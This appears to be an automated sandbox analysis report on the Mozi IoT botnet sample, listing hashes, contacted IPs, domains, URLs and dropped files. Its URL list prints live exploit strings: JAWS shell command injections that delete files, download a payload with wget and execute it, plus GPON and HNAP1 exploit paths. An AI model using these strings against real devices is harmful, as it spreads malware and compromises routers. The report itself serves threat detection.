We are hiring! Windows Kernel Developer (Remote), apply here!
flash

Mozi.m

Status: finished
Submission Time: 2021-01-06 14:56:50 +01:00
Malicious
Spreader
Trojan
Evader
Mirai

Comments

Tags

Details

  • Analysis ID:
    336612
  • API (Web) ID:
    575112
  • Analysis Started:
    2021-01-06 14:56:50 +01:00
  • Analysis Finished:
    2021-01-06 15:05:57 +01:00
  • MD5:
    eec5c6c219535fba3a0492ea8118b397
  • SHA1:
    292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
  • SHA256:
    12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
  • Technologies:
Full Report Management Report IOC Report Engine Info Verdict Score Reports

System: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)

malicious
100/100

malicious
42/60

malicious
20/29

malicious

IPs

IP Country Detection
220.77.193.240
Korea Republic of
117.215.212.106
India
94.218.155.42
Germany
Click to see the 97 hidden entries
114.121.10.199
Indonesia
134.231.205.27
United States
77.228.102.211
Spain
209.172.239.20
United States
105.66.122.27
Morocco
53.195.132.11
Germany
178.194.165.28
Switzerland
47.68.223.209
United States
94.100.8.171
Latvia
62.28.85.104
Portugal
60.62.87.52
Japan
9.40.197.176
United States
210.163.103.147
Japan
80.16.115.71
Italy
73.28.67.252
United States
75.219.92.123
United States
171.119.52.25
China
142.229.204.168
Canada
172.132.119.56
United States
5.121.35.27
Iran (ISLAMIC Republic Of)
2.65.140.74
Sweden
180.73.239.45
Malaysia
53.1.41.196
Germany
197.96.161.16
South Africa
129.202.100.185
United States
57.254.163.96
Belgium
2.145.36.76
Iran (ISLAMIC Republic Of)
59.144.65.60
India
25.130.210.228
United Kingdom
191.149.175.228
Colombia
12.75.120.193
United States
208.117.24.230
United States
156.103.6.132
United States
159.236.79.191
United Kingdom
185.168.218.12
Sweden
58.203.19.48
China
23.14.79.151
United States
26.136.146.193
United States
35.112.44.223
United States
149.0.219.73
Turkey
191.167.5.44
Brazil
16.146.174.98
United States
88.191.3.65
France
144.186.202.188
United States
22.29.199.59
United States
145.194.203.75
Netherlands
33.154.196.97
United States
203.252.131.239
Korea Republic of
28.165.107.6
United States
191.192.107.140
Brazil
187.91.94.164
Brazil
126.165.206.91
Japan
161.133.111.129
United States
143.109.130.79
United States
13.71.214.153
United States
141.41.40.120
Germany
207.53.210.155
United States
99.13.185.86
United States
58.19.104.190
China
117.47.222.71
Thailand
99.184.167.96
United States
204.91.96.177
United States
170.169.46.241
Mexico
176.102.9.236
Ukraine
95.43.183.235
Bulgaria
186.51.139.183
Uruguay
158.225.192.80
Germany
19.215.174.22
United States
23.11.95.110
United States
185.154.41.162
Austria
72.159.64.151
United States
40.130.183.40
United States
5.166.73.219
Russian Federation
202.227.33.60
Japan
95.104.92.175
Georgia
29.127.165.200
United States
108.225.201.127
United States
220.42.145.217
Japan
186.85.54.171
Colombia
201.248.155.210
Venezuela
153.10.223.14
United States
129.9.60.164
United States
71.129.56.39
United States
198.150.168.4
United States
122.57.213.95
New Zealand
27.9.246.216
China
62.162.153.81
Macedonia
148.165.10.222
United States
123.232.159.36
China
146.159.102.16
Switzerland
212.60.225.210
Germany
32.162.242.238
United States
27.32.17.46
Australia
33.201.125.252
United States
155.105.12.11
Switzerland
155.151.158.228
United States
200.44.135.0
Venezuela

Domains

Name IP Detection
dht.transmissionbt.com
87.98.162.88
bttracker.acc.umu.se
130.239.18.159
router.bittorrent.com
67.215.246.10
Click to see the 2 hidden entries
router.utorrent.com
82.221.103.244
bttracker.debian.org
0.0.0.0

URLs

Name Detection
http://107.170.200.206:80/HNAP1/
http://23.218.148.138:80/HNAP1/
http://51.178.69.101:80/HNAP1/
Click to see the 42 hidden entries
http://38.87.83.34:80/HNAP1/
http://34.117.168.156:80/HNAP1/
http://%s:%d/Mozi.m;
http://%s:%d/bin.sh
http://%s:%d/Mozi.m;/tmp/Mozi.m
http://203.146.142.202:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://104.98.58.115:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://184.31.173.81:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://23.218.46.16:80/HNAP1/
http://45.196.102.179:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://%s:%d/Mozi.m
http://54.164.156.191:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://%s:%d/bin.sh;chmod
http://127.0.0.1:8080/GponForm/diag_Form?images/
http://%s:%d/Mozi.m;$
http://23.44.146.105:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://127.0.0.1:80/GponForm/diag_Form?images/
http://192.155.170.244:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://www.alsa-project.org.
http://www.pastebin.ca
http://purenetworks.com/HNAP1/
http://www.alsa-project.org/alsa-info.sh
http://pastebin.ca)
http://HTTP/1.1
http://%s:%d/Mozi.a;sh$
http://www.pastebin.ca.
http://schemas.xmlsoap.org/soap/envelope//
http://%s:%d/Mozi.a;chmod
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
http://schemas.xmlsoap.org/soap/encoding/
http://schemas.xmlsoap.org/soap/envelope/
http://ipinfo.io/ip
http://206.212.1.199:80/HNAP1/
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
http://127.0.0.1sendcmd
http://14.250.195.170:49152/soap.cgi?service=WANIPConn1
http://www.alsa-project.org/cardinfo-db/
http://127.0.0.1
http://www.pastebin.ca/upload.php
http://www.alsa-project.org
http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/

Dropped files

Name File Type Hashes Detection
/etc/init.d/mountall.sh
ASCII text
#
/usr/bin/gettext.sh
ASCII text
#
/usr/networks
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
#
Click to see the 97 hidden entries
/usr/sbin/alsa-info.sh
ASCII text, with very long lines
#
/etc/rcS.d/S95baby.sh
POSIX shell script, ASCII text executable
#
/etc/rc.local
ASCII text
#
/etc/profile.d/vte-2.91.sh
ASCII text
#
/etc/profile.d/cedilla-portuguese.sh
ASCII text
#
/etc/profile.d/bash_completion.sh
ASCII text
#
/etc/profile.d/apps-bin-path.sh
ASCII text
#
/etc/profile.d/Z97-byobu.sh
ASCII text
#
/etc/init.d/umountnfs.sh
ASCII text
#
/etc/init.d/mountnfs.sh
ASCII text
#
/etc/init.d/mountnfs-bootclean.sh
ASCII text
#
/etc/init.d/mountkernfs.sh
ASCII text
#
/etc/init.d/mountdevsubfs.sh
ASCII text
#
/etc/init.d/mountall-bootclean.sh
ASCII text
#
/etc/init.d/hwclock.sh
ASCII text
#
/etc/init.d/hostname.sh
ASCII text
#
/etc/init.d/checkroot.sh
ASCII text
#
/etc/init.d/checkroot-bootclean.sh
ASCII text
#
/etc/init.d/checkfs.sh
ASCII text
#
/etc/init.d/bootmisc.sh
ASCII text
#
/etc/init.d/S95baby.sh
POSIX shell script, ASCII text executable
#
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-whatchanged.sh
ASCII text
#
/usr/share/doc/git/contrib/fast-import/git-import.sh
ASCII text
#
/usr/share/doc/git/contrib/git-resurrect.sh
ASCII text
#
/usr/share/doc/git/contrib/remotes2config.sh
ASCII text
#
/usr/share/doc/git/contrib/rerere-train.sh
ASCII text
#
/usr/share/doc/git/contrib/subtree/git-subtree.sh
ASCII text
#
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-verify-tag.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-tag.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-revert.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-resolve.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-reset.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-repack.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-pull.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-notes.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-merge.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-merge-ours.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-ls-remote.sh
ASCII text
#
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh
ASCII text
#
/usr/share/doc/xdotool/examples/ffsp.sh
ASCII text
#
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh
ASCII text
#
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh
ASCII text
#
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh
ASCII text
#
/usr/share/doc/tmux/examples/bash_completion_tmux.sh
ASCII text
#
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh
ASCII text
#
/usr/share/doc/netcat-openbsd/examples/dist.sh
ASCII text
#
/usr/share/doc/mdadm/examples/mdadd.sh
ASCII text
#
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh
ASCII text
#
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh
ASCII text
#
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh
ASCII text
#
/usr/share/doc/ifupdown/examples/ping-places.sh
ASCII text
#
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh
ASCII text
#
/usr/share/doc/ifupdown/examples/get-mac-address.sh
ASCII text
#
/usr/share/doc/ifupdown/examples/check-mac-address.sh
ASCII text
#
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh
ASCII text
#
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh
ASCII text
#
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh
ASCII text
#
/etc/wpa_supplicant/functions.sh
ASCII text
#
/usr/share/cups/braille/indexv4.sh
ASCII text
#
/usr/share/cups/braille/indexv3.sh
ASCII text
#
/usr/share/cups/braille/index.sh
ASCII text
#
/usr/share/cups/braille/cups-braille.sh
UTF-8 Unicode text
#
/usr/share/brltty/initramfs/brltty.sh
ASCII text
#
/usr/share/alsa/utils.sh
ASCII text
#
/usr/share/alsa-base/alsa-info.sh
ASCII text, with very long lines
#
/tmp/.config
ASCII text
#
/etc/wpa_supplicant/ifupdown.sh
ASCII text
#
/usr/share/debconf/confmodule.sh
ASCII text
#
/etc/wpa_supplicant/action_wpa.sh
ASCII text
#
/etc/bash_completion.d/libreoffice.sh
ASCII text
#
/etc/acpi/undock.sh
ASCII text
#
/etc/acpi/tosh-wireless.sh
ASCII text
#
/etc/acpi/powerbtn.sh
ASCII text
#
/etc/acpi/ibm-wireless.sh
ASCII text
#
/etc/acpi/asus-wireless.sh
ASCII text
#
/etc/acpi/asus-keyboard-backlight.sh
ASCII text
#
/usr/share/doc/gdb/contrib/expect-read1.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-gc.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-fetch.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-commit.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-clone.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-clean.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-checkout.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-am.sh
OS/2 REXX batch file, ASCII text
#
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh
ASCII text
#
/usr/share/doc/gdb/contrib/gdb-add-index.sh
ASCII text
#
/usr/share/doc/git/contrib/examples/git-log.sh
ASCII text
#
/usr/share/doc/gdb/contrib/ari/gdb_find.sh
ASCII text
#
/boot/grub/i386-pc/modinfo.sh
ASCII text
#
/usr/share/doc/gawk/examples/prog/igawk.sh
awk or perl script, ASCII text
#
/usr/share/doc/gawk/examples/network/PostAgent.sh
ASCII text
#
/usr/share/doc/cron/examples/cron-tasks-review.sh
ASCII text
#
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh
ASCII text
#
/usr/share/doc/acpid/examples/default.sh
ASCII text
#
/usr/share/doc/acpid/examples/ac.sh
ASCII text
#